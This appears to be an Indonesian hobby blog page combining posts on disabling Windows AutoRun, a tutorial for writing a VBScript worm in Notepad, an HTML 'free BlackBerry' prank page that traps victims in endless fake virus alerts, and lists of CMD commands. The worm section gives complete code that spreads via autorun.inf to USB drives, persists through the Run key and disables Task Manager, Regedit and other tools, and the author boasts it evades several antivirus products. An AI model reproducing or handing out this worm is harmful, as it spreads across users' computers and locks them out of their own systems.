Cara Menonaktifkan AutoRun

Mungkin kebanyakan dari kita geram dengan autorun dalam file kita yang digunakan untuk penyebaran virus.

Cara menonaktifkan autorun.
Langkah 1 : Click Start->Run atau tekan tombol Window + R pada keyboard untuk menampilkan kotak dialog Run.
Langkah 2 : Ketik regedit lalu tekan Enter untuk menjalankan Registry Editor.
Langkah 3 : Pada kiri, panel klik ganda folder untuk memperluas dan pergi ke
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
Langkah 4 : Pada panel sebelah kanan double klik NoDriveTypeAutoRun
Langkah 5 : Pada Value Data , ketik FF untuk Heksadesimal atau 255 untuk nilai desimal.
Langkah 6 : Tutup Registry Editor dan restart komputer.
Cara menonaktifkan autorun dengan Notepad
Berikut ini adalah kunci registri yang bisa Anda gunakan untuk mem blok autorun.inf. Buka notepad atau teks editor lainnya, salin teks di bawah ini dan simpan sebagai NoAutoRun.reg. Pastikan save dengan ekstensi . Reg bukan. Txt.
REGEDIT4
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionIniFileMappingAutorun.inf]
@ = “@ SYS: DoesNotExist”
Jalankan file tersebut, klik Yes jika ada konfirmasi.
Masalah dengan hack ini adalah bahwa installer CD atau DVD tidak akan lagi berjalan secara otomatis, anda harus mencari file setup dengan manual. tapi saya pikir bukanlah masalah besar dibandingkan dengan jika terinfeksi oleh virus dan harus menghabiskan berjam-jam membersihkannya.
lengkapnya

Virus Dengan NotePad

hehehehe kmarin saya baru dari tempat teman dan
Iseng-iseng mencolok Flash Disc temen saya tiba-tiba saya nemu sebuah malcode lokal yang dibuat dengan bahasa VBS. Wah, ternyata para virus maker mulai melirik memakai bahasa VBS. Mungkin karena menyangkut HAKI (Hak Atas Kekayaan Intelektual) karena VB6.0 yang banyak beredar adalah bajakan. Jadi ia membuat virus dengan VBS yang bisa dibuat hanya dengan Notepad karena di Windows sudah ada compiler yang terintegrasi dengannya, Windows Based Script Host.Sesua janji saya, kita akan membuat virus yang sederhana menggunakan Notepad. Virus ini akan membuat dirinya menyebar ke removable disc dengan AutoRun sehingga komputer lain yang tercolok flash disc terinfeksi akan langsung menjadi korban tanpa menungu User menjalankan infector-nya. Virus ini saya beri nama “Kalong.VBS”. Sekarang buka Notepad-nya. Copy kode berikut :

‘//–Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan kegiatan virus–//
on error resume next’//–Dim kata-kata berikut ini–//
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,kalong,nt,check,sd
‘//–Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information–//
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe k4l0n6.dll.vbs”
set fs = createobject(“Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do
‘//–Copy diri untuk menjadi file induk di Windows Path (example: C:\Windows)
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)
tf.attributes = 32
set tf=fs.createtextfile(windowpath & “\batch- k4l0n6.dll.vbs”,2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)
tf.attributes = 39
‘//–Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok–//
‘Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket
for each flashdrive in fs.drives
‘//–Cek Drive–//
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path “A:” then
‘//–Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\–//
set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\k4l0n6.dll.vbs “,2,true)
tf.write rekursif
tf.close
set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)
tf.attributes = 39
‘//–Buat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)–//
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf = fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next
‘//–Manipulasi Registry–//
set kalong = createobject(“WScript.Shell”)
‘//–Manip – Ubah Title Internet Explorer menjadi THE KALONG v.s. ZAY–//
kalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,” THE KALONG v.s. ZAY “
‘//–Manip – Set agar file hidden tidak ditampilkan di Explorer–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “0″, “REG_DWORD”
‘//–Manip – Hilangkan menu Find, Folder Options, Run, dan memblokir Regedit dan Task Manager–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”
‘//–Manip – Disable klik kanan–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”
‘//–Manip – Munculkan Pesan Setiap Windows Startup–//
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Worm Kalong. Variant from Rangga-Zay, don’t panic all data are safe.”
‘//–Manip – Aktif setiap Windows Startup–//
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, windowpath & “\batch- k4l0n6.dll.vbs “
‘//–Manip – Ubah RegisteredOwner dan Organization–//
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “The Batrix”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”,”Kalong”
‘//–Nah kalau kode dibawah ini saya nggak tau, tolong Mas Aat_S untuk menjelaskan–//
if check 1 then
Wscript.sleep 200000
end if
loop while check 1
set sd = createobject(“Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
‘Akhir dari Kode
Save code di Notepad dengan cara FILE > SAVE. Lalu di save as type pilih “All Files (*.*). Simpan dengan nama : k4l0n6.dll.vbs. Sebenarnya gak usah pake *.dll juga gak apa-apa tapi usaha agar tidak mencurigakan aja.
He..he…Virus Worm ini memang bukan murni dari pemikiran saya sendiri karena meniru kode-nya virus Rangga-Zay. Tapi yang ini lebih bagus karena tidak terdeteksi pakai PCMAV RC15, CLAMAV, dan AVAST. Itung-itung ini buat Anda tahu kalau membuat virus/worm tidak perlu membeli software bajakan. Pakai Notepad (dari Windows Original) juga bisa.

Program prank dengan HTML

Membuat  suatu tipuan prank dengan HTML terkadang juga menyenangkan, apalagi jika mengetahui si korban kebingungan karenanya, , , sekarang sata akan berbagi ilmu dari sumber yang saya dapat  , , ,
silahkan buka notepad dan ketikan script berikut :

<center>silahkan input tipe blacberry kesukaan anda <br>
nama anda akan diundi untuk mendapatkan BB gratis<br><input type="text"></input>
<p>
<html>
<head>
<script type="text/javascript">
function display_alert()
{
alert("komputer anda terkena trojan horse ! ! ! ! ! ! !")
var b=true
while (b==true)
{
alert("virus found ! ! ! ! !")
}
}
</script>
</head>
<body><input type="button" onclick="display_alert()" value="submit" /></body>
</html></center>

setelah mengetikan sript berikut maka simpanlah dengan format .html dan simpan, , , jika ingin lebih meyakinkan korban silahkan memodifikasi sendiri script ini, , ,
Ulasan ini merupakan tambahan ilmu saja , , ,sehingga jika terjadi kesalahan berlebihan maka resiko ditanggung penumpang, , , chaw and salam olahraga.

Perintah - Perintah dalam jaringan komputer dengan CMD

ADDUSERS - Memasukkan/ menambah user ke/dari file CSV.

ARP - Address Resolution Protocol

ASSOC Change - file extension associations

ASSOCIAT - One step file association

AT Schedule - Perintah untuk membuat shedule program (utk dijalankan kemudian waktu)

ATTRIB - Mengganti atribut file

BOOTCFG - Edit boot setting windows

BROWSTAT - Mencari info domain,browser dan PDC

CACLS - Mengganti/mengubah file permissions

CALL - Memanggil sebuah program batch

CD - Memindahkan ke sebuah folder tertentu.

CHANGE - Mengubah Properties pada Terminal Server

CHKDSK - Memeriksa dan memperbaiki file system

CHKNTFS - Memeriksa NTFS file system

CHOICE - Menerima input keyboard ke dalam sebuah batch file

CIPHER - Encrypt-Decrypt files/folders

CleanMgr - Membersihkan secara otomatis Temporary files, recycle bin

CLEARMEM - Membersihkan memory
CLIP - meng-Copy STDIN ke Windows clipboard.
CLS - Membersihkan layar CMD
CLUSTER - Windows Clustering
CMD - Membuka layar CMD/ command prompt
COLOR - Mengganti warna pada window CMD
COMP - Membandingkan isi dari 2 atau lebih file
COMPACT - kompres file/folder di dalam partisi NTFS
COMPRESS - kompres file individu di dalam partisi NTFS
CON2PRT - Connect atau disconnect sebuah Printer
CONVERT - Convert FAT drive menjadi NTFS.
COPY - Copy 1 atau lebih file ke lokasi tertentu
CSVDE - Import/Export Active Directory data
DATE - Menampilkan/mengatur tanggal
Dcomcnfg - DCOM Configuration Utility
DEFRAG - Defragment hard drive
DEL - Menghapus 1 atau lebih file
DELPROF - Menghapus User Profile NT
DELTREE - Menghapus sebuah folder beserta subfolder
DevCon - Device Manager Command Line Utility
DIR - Menampilkan daftar file/folder dari sebuah drive
DOSKEY - Mengedit command line,recall commands,dan create macros
DSADD - Menambah user (computer, group..) ke dalam active directory
DSQUERY - Menambah item ke dalam active directory
DSMOD - Modify user (computer, group..) di dalam active directory
EXIT - keluar dari window CMD
EXPAND - Uncompress file
EXTRACT - Uncompress CAB files
FC - Membandingkan 2 buah file
FDISK - Disk Format dan partition
FIND - Mencari sebuah text string di dalam sebuah file
FREEDISK - Menampilkan free disk space (dalam bytes)
FSUTIL - File and Volume utilities
FTP - File Transfer Protocol
FTYPE - Menampilkan/mengubah file types yg digunakan dalam file extension
GOTO - Mengarahkan sebuah program batch untuk melompat ke labelled line
KILL - Menghapus program dari memory
LABEL - Memberi/mengubah label disk
LOCAL - Menampilkan daftar anggota local groups
LOGEVENT - Menulis text ke dalam NT event viewer.
LOGOFF - Keluar dari system / Mengeluarkan user dari system
MD - Create new folders
MODE - Configure a system device
MOUNTVOL - Mengatur Mount point dalam sebuah volume
MOVE - Memindahkan file dari sebuah folder ke folder lain
MSIEXEC - Microsoft Windows Installer
MSINFO - Windows NT diagnostics
MSTSC - Terminal Server Connection (Remote Desktop Protocol)
MUNGE - Mencari dan Menganti text di dalam sebuah file (find & replace)
MV - Meng-copy file yang sedang/sementara digunakan
NET - Mengatur network resources
NETDOM - Domain Manager
NETSH - Configure network protocols
NETSVC - Command-line Service Controller
NBTSTAT - Menampilkan networking statistics (NetBIOS over TCP/IP)
NTBACKUP - Backup folders
NTRIGHTS - Edit user account rights (wilayah akses yg diizinkan oleh admin)
PATH - Menampilkan atau mengatur search path untuk executable files
PATHPING - Melacak route plus network latency dan packet loss
PAUSE - Menahan proses sebuah batch file and menampilkan message
PING - Menguji (test) network connection
POPD - Restore previous value dari sebuah directory yang di-save oleh PUSHD
PRNCNFG - Menampilkan, mengatur, atau mengubah nama printer
PRNMNGR - Menampilkan, menghapus, atau menambah daftar printer; set default printer
PROMPT - Mengubah command prompt
PsExec - Menjalankan proses jarak jauh (remote)
PsFile - Menunjukkan file2 yang dibuka dari jarak jauh
PsLoggedOn - Who's logged on (mengecek secara lokal atau melalui resource sharing)
PsLogList - Event log records
PsPasswd - Mengubah account password
PsService - Menampilkan dan mengubah services
PsShutdown - Shutdown atau reboot computer
PsSuspend - Suspend/menahan proces
PUSHD - Menyimpan/Save dan mengganti current directory
QGREP - Mencari kata/kalimat di dalam file yg sesuai dgn pola/line yg ditentukan.
RASDIAL - Mengatur RAS connections
RASPHONE - Mengatur RAS connections
RECOVER - Memulihkan/Recover damaged file dari sebuah disk defective (rusak).
REM - Merekam/mencatat comments (remarks) di dalam sebuah batch file
REPLACE - Mengganti/Replace atau meng-update sebuah file dengan file line
RDISK - Create Recovery Disk
RMTSHARE - Share folder atau printer
ROUTE - Memanipulasi network routing tables
RUNAS - Menjalankan sebuah program dgn menggunakan user account lain.
RUNDLL32 - Menjalankan sebuah DLL command (add/remove print connections)
ScriptIt - Control GUI applications
SET - Display, set, atau remove environment variables
SHOWGRPS - Menampilkan daftar NT Workgroups atau user yang telah joined
SHOWMBRS - Menampilkan daftar Users yg merupakan member dari sebuah Workgroup
SLEEP - Menunggu selama beberapa saat
SOON - Menjadwal(schedule) sebuah command untuk beberapa waktu kemudian
START - membuka sebuah window baru, untuk menjalankan program atau command tertentu
SUBINACL - Edit file & folder Permissions, Ownership serta Domain
SUBST - Menyesuaikan sebuah path dengan drive letter
SYSTEMINFO - Menampilkan daftar system configuration
TASKLIST - Menampilkan daftar aplikasi dan service yang sedang berjalan
VERIFY - Memeriksa apakah files telah ter-save
VOL - Menampilkan disk label
WHERE - Mencari dan menampilkan files di dalam sebuah directory tree
WINMSDP - Windows system diagnostics II
WMIC - WMI Commands
XCACLS - Mengubah file permissions (hak akses)
XCOPY - Copy files dan folders

Perintah - Perintah mematikan dalam CMD

Dalam CMD ada bayak parintah-perintah yang bisa membuat kita pusing jika menuliskannya,  , , contoh perintah dalam CMD dalam melacak IP address.

1. ipconfig /all
Menampilkan informasi konfigurasi koneksi, misalnya Host Name, Primary DNS Type, Ethernet Adapter LAN.

2. ipconfig /flushdns
Menghapus DNS Cache

3. ipconfig /release
“Menghapus” semua koneksi IP Address.

4. ipconfig /renew
Membuat IP Address baru untuk adapter tertentu.

5. ipconfig /displaydns
Menampilkan DNS Cache.

6. ipconfig /registerdns
Melakukan refresh DNS dan meregister kembali koneksi DNS.

7. ipconfig /showclassid
Menampilkan informasi DHCP Class.

8. ipconfig /setclassid
Mengubah DHCP Class ID

9. control netconnections
Menampilkan Network Connection.

10. nslookup
Mengetahui alamat ip address dari nama domain yang di tuliskan

11. netstat
Menampilkan informasi koneksi TCP/IP yang sedang aktif.

12. route
Menampilkan local route.

13. hostname
Menampilkan nama komputer.

14. ping
Contoh: ping http://anjees.blogspot.com
Melakukan test koneksi ke situs http://anjees.blogspot.com
Semakin sedikit % loss-nya maka semakin baik koneksinya.


15. tracert
Menampilkan informasi IP Address route.